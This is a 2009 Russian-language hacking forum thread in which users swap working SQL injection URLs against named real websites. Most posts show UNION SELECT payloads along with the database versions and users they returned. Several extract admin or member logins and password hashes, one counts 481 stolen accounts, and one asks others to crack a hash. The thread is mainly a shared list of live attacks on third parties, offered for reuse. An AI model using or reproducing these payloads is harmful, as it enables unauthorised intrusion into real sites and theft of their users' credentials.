ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.11.2009, 14:27
Аватар для hackmen
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

to Gaus

Код:
http://www.game-reviews.ca/news.php?id=1422+and+1=0+union+select+1,concat_ws(0x3a,login,password),3,4,5,6,7,8,9,10,11+from+admin--
5.0.67-standard:gamerevi_news@localhost:gamerevi_gamenews


Там есть еще данные форума

[ username,password ] from [gamerevi_gamenews.pubb2_users ]
 
Ответить с цитированием

  #2  
Старый 15.11.2009, 13:34
Аватар для pelligrim
pelligrim
Познающий
Регистрация: 26.04.2008
Сообщений: 31
Провел на форуме:
31474

Репутация: 53
По умолчанию

Код:
http://ukrturizm.com.ua/index.php?id=-293+union+select+1,2,3,concat_ws(0x3a,version(),user(),database()),5,6,7--
4.1.25-log:atur@localhost:atur

Код:
http://www.tsetse220.com/news.php?id=-142+union+select+1,concat_ws%280x3a,version%28%29,user%28%29,database%28%29%29,3,4,5--
5.0.51a-3ubuntu5.4:root@localhost:tsetse220

Код:
http://www.otcheta.net/news.php?id=13005+and+substring%28version%28%29,1,1%29=4
version: 4.1.25-log
 
Ответить с цитированием

  #3  
Старый 15.11.2009, 20:19
Аватар для hack-win32
hack-win32
Познающий
Регистрация: 11.10.2009
Сообщений: 33
Провел на форуме:
88588

Репутация: 99
По умолчанию

db9330@64.13.192.28:db9330_blog:4.1.25-Debian_mt1
Код:
http://www.blamm.com/top10.php?id=-8+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47--

codeglue2@WSWWW07:codeglue2:5.0.85-community-nt
Код:
http://www.codeglue.com/game.php?id=-1+union+select+1,concat_ws(0x3a,user(),database(),version()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19--

rpgui@localhost:RPGuides:5.0.51a-3ubuntu5.4
Код:
http://www.rpguides.de/dnd/game.php?id=-67+union+select+1,2,3,4,5,6,7,8,9,10,11,12,concat_ws(0x3a,user(),database(),version()),14,15--
 
Ответить с цитированием

  #4  
Старый 16.11.2009, 04:21
Аватар для hackmen
hackmen
Участник форума
Регистрация: 22.10.2007
Сообщений: 119
Провел на форуме:
598447

Репутация: 123
По умолчанию

http://www.rav.org/upper/newsDetail.php?id=170+union+select+1,2,3,4,5,6,7,8 ,9,10--

user:sql@maimonides.org@207.155.252.14
base:maimoDB
os:sun-solaris2.8
mysql.user:sql@maimonides.org

file_priv:N
ver:4.1.22-log

[ id,username,pwd ] from [ users ]
-----------------------------------------

Последний раз редактировалось jokester; 16.11.2009 в 11:41.. Причина: пароли
 
Ответить с цитированием

  #5  
Старый 16.11.2009, 12:50
Аватар для DezMond™
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
Провел на форуме:
961428

Репутация: 662
Отправить сообщение для DezMond™ с помощью ICQ
По умолчанию

http://www.cg.com.ve/noticia.php?id=-222+union+select+1,concat_ws(0x3a3a,login,contrase na,nombre),3,4,5,6,7,8,9,10,11,12+from+usuarios+li mit+2,1+/*+


http://www.pepedoro.it/pepedoroblog/magazine.php?acts=report&id=-79'+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14, 15,16,17+/*+


http://www.spotbit.com/main/inside_search.php?&title=6&memberid=-2278+uNiOn+sElEct+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,3 1,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47, 48,49,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64 ,65,66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,8 1,82,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97, 98,99,100,101,102,103+/*+
 
Ответить с цитированием

  #6  
Старый 16.11.2009, 15:26
Аватар для $n@ke
$n@ke
Постоянный
Регистрация: 18.09.2006
Сообщений: 867
Провел на форуме:
2805813

Репутация: 1396


По умолчанию

ням,но сцк не фартит..
Цитата:
http://www.kishwaukeecollege.edu/athletics/player.shtml?id=-216+union+select+1,2,3,4,version(),6,7,8,9,10,11,1 2,13,14,15,16,17,18,19/*
Db: internet
Version: 4.1.22-log
User: interusr@webserver
 
Ответить с цитированием

  #7  
Старый 16.11.2009, 18:39
Аватар для Sams
Sams
Участник форума
Регистрация: 18.04.2009
Сообщений: 120
Провел на форуме:
435863

Репутация: 80
По умолчанию

openheartsopenminds.org.uk

Код:
http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,version(),5,6+--+
Version: 5.0.45-community-nt
Database: sitesplus
User: sitesplus@localhost

Таблицы:
Код:
http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,table_name,5,6+from+information_schema.tables+limit+0,1+--+
Присутствует таблица tb_users, столбцы:
user_id
site_id
user_name
user_password
expired

Код:
http://www.openheartsopenminds.org.uk/news.php?id=-530+union+select+1,2,3,concat(user_name,0x5A,user_password),5,6+from+tb_users+limit+0,1+--+

Всего 481 аккаунт.
 
Ответить с цитированием

  #8  
Старый 16.11.2009, 19:57
Аватар для Bb0y
Bb0y
Участник форума
Регистрация: 30.10.2009
Сообщений: 103
Провел на форуме:
736224

Репутация: 388
Отправить сообщение для Bb0y с помощью ICQ Отправить сообщение для Bb0y с помощью Yahoo
По умолчанию

MySQL 5.0.45-community-log
http://www.patfalvey.com/viewnews.php?id=-4+union+select+1,2,column_name,4,5,6,7+from+inform ation_schema.columns+where+table_name=0x6d656d6265 72--
member::m_id,m_name,m_subscribed,m_unsubscribed,m_ email
http://www.patfalvey.com/viewnews.php?id=-4+union+select+1,2,concat_ws(0x0b,m_id,0x3a,m_name ,0x3a,m_subscribed,0x3a,m_unsubscribed,0x3a,m_emai l),4,5,6,7+from+member--
выводит все строки сразу.
Вывод ошибок отключен.
 
Ответить с цитированием

  #9  
Старый 16.11.2009, 22:18
Аватар для mailbrush
mailbrush
Познавший АНТИЧАТ
Регистрация: 24.06.2008
Сообщений: 1,996
Провел на форуме:
6075534

Репутация: 2731


Отправить сообщение для mailbrush с помощью ICQ
По умолчанию

Код:
http://www.artero.ru/album.php?p=1&n=530)+and+null+union+select+1,2,3,concat_ws(0x3a,user(),database(),version()),5,6,7,8,9%23
Код:
db0743811@10.0.0.33:db0743811:5.0.51a
 
Ответить с цитированием

  #10  
Старый 17.11.2009, 16:06
Аватар для 547
547
Участник форума
Регистрация: 11.10.2009
Сообщений: 116
Провел на форуме:
472147

Репутация: 211
По умолчанию

esamiafrica@localhost:4.1.20:esamiafrica_site

Код:
http://www.esami-africa.org/research.php?id=-61+union+select+concat_ws(0x3a,id,username,pword)+from+admin--
Жаль хэшык неразбрутил(... кому удастся отпишитесь плиз....
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 2 (пользователей: 0 , гостей: 2)
 


Быстрый переход




ANTICHAT.XYZ